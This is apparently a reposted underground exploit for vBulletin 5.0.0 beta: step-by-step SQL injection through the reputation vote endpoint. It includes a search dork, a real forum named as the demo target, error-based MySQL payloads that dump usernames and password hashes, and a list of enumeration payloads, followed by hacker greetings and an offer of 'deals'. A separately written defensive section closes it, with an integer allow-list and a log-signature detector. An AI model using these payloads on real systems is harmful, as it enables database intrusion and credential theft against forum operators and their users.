@nikcub
Created December 3, 2013 11:33

vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day
#Category: web application
#Type: SQL Injection
#Requirements: Firefox / Live HTTP Headers
#Dork: Powered by vBulletin™ Version 5.0.0 Beta (or) use your brain, you'll get more o_O
Step 1
Create an account on the vBulletin forum, verify the account and activate it.
For the demo we will use this forum:
Link = http://www.prospectrush.com/new_forum/
I have already made an account so I will log in directly.
Step 2
Go to/open any topic and open Live HTTP Headers (https://addons.mozilla.org/en/firefox/addon/live-http-headers/) << download from here,
then on the topic page find the "Like" button and click on it.
The HTTP request and response will then be captured by the Live HTTP Headers add-on.
Step 3
Go to the first POST in Live HTTP Headers; it will look like this:
POST *Something /ajax/api/reputation/vote HTTP/1.1
Select it and click the Replay button.
Step 4
Then go to Send POST Content and use the query below;
just add it right after "noteid=somenumber".
=======================
SQL Query
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
=======================
The above SQLi command will fetch the first record from the user table (username/password).
You will see the username and the hashed password; get the salt too and crack it. I won't show the cracking, use your brain :)
=============
Greets to Real Author, All Indian & Pakistani Brothers, 1337day, ashiyane forums & All Indian Hacking Groups
//Note : Those Brothers who have my mail id can Contact me for other Deals
Offer Valid till 29th March 2013
Regards
./NoTty_rAJ
Thanks
[#Other SQLi Syntaxes]
*********************************************************************************************************************
|Version():
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
|User():
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
|Database():
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
|Database Print:
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
|Table Count:
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
|Print Tables:
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
|Columns of selected table:
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
|Fetch Out Data:
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
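Both the Step 4 query and every variant in the list above work only because the `noteid` value reaches the database unvalidated, and all of them share one MySQL error-based signature (a `floor(rand(0)*2)` column grouped in a subquery over `information_schema`). The Python below is an added example from the defender's side, not code from this gist or from vBulletin: the strict integer allow-list the vote endpoint should have applied to `noteid`, and a triage check that flags logged POST bodies carrying that signature. The sample bodies are constructed, the parameter names other than `noteid` are assumptions, and the signature list is an assumed starting point for log review rather than a complete WAF rule set.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed sample POST bodies for a reputation/vote endpoint. Only "noteid"
# comes from the gist; the other parameter names are assumptions.
SAMPLE_BODIES = [
    # benign vote
    "securitytoken=tok123&nodeid=42&noteid=1337&type=1",
    # error-based injection appended to noteid (constructed, no data extraction)
    ("securitytoken=tok123&nodeid=42&noteid=1337) and(select 1 from(select count(*),"
     "concat((select version()),floor(rand(0)*2))x from information_schema.tables "
     "group by x)a) AND (1338=1338&type=1"),
    # URL-encoded tamper with none of the signature tokens: only the allow-list catches it
    "securitytoken=tok123&nodeid=42&noteid=1337%29+AND+%281338%3D1338&type=1",
]

NOTEID_RE = re.compile(r"\d{1,10}")


def validate_noteid(raw):
    """Allow-list check the endpoint should apply before the value nears SQL.

    Only a plain decimal integer is accepted; anything else is rejected outright.
    The returned int is what a parameterised query would bind, never concatenate.
    """
    if raw is None or not NOTEID_RE.fullmatch(raw):
        return None
    return int(raw)


# Textual markers of the MySQL error-based (duplicate group key) technique that
# every payload in this gist relies on. Assumed list, tuned for log triage.
SIGNATURES = {
    "floor_rand": re.compile(r"floor\(\s*rand\(\s*0?\s*\)\s*\*\s*2\s*\)"),
    "group_by_alias": re.compile(r"group\s+by\s+\w+\s*\)"),
    "information_schema": re.compile(r"information_schema\s*\."),
    "tilde_markers": re.compile(r"concat\(\s*0x7e"),
}


def normalise(body):
    """Undo the encodings a naive regex would miss: URL decoding, case, whitespace runs."""
    return re.sub(r"\s+", " ", unquote_plus(body)).lower()


def detect_error_based_sqli(body):
    """Return the names of the signatures present in a decoded request body."""
    text = normalise(body)
    return [name for name, pat in SIGNATURES.items() if pat.search(text)]


def triage(body):
    """Run both checks over one logged POST body and summarise the verdict."""
    params = parse_qs(body, keep_blank_values=True)
    raw = params.get("noteid", [None])[0]
    noteid = validate_noteid(raw)
    hits = detect_error_based_sqli(body)
    return {
        "noteid": noteid,
        "noteid_valid": noteid is not None,
        "signatures": hits,
        # either check alone is enough to flag the request for review
        "suspicious": noteid is None or bool(hits),
    }


if __name__ == "__main__":
    for sample in SAMPLE_BODIES:
        print(triage(sample))
```

The allow-list is the real fix and needs no knowledge of payload shape; the signature check exists for reviewing logs from the period before the fix was deployed, which is why the third sample is flagged by the allow-list alone while the second trips both.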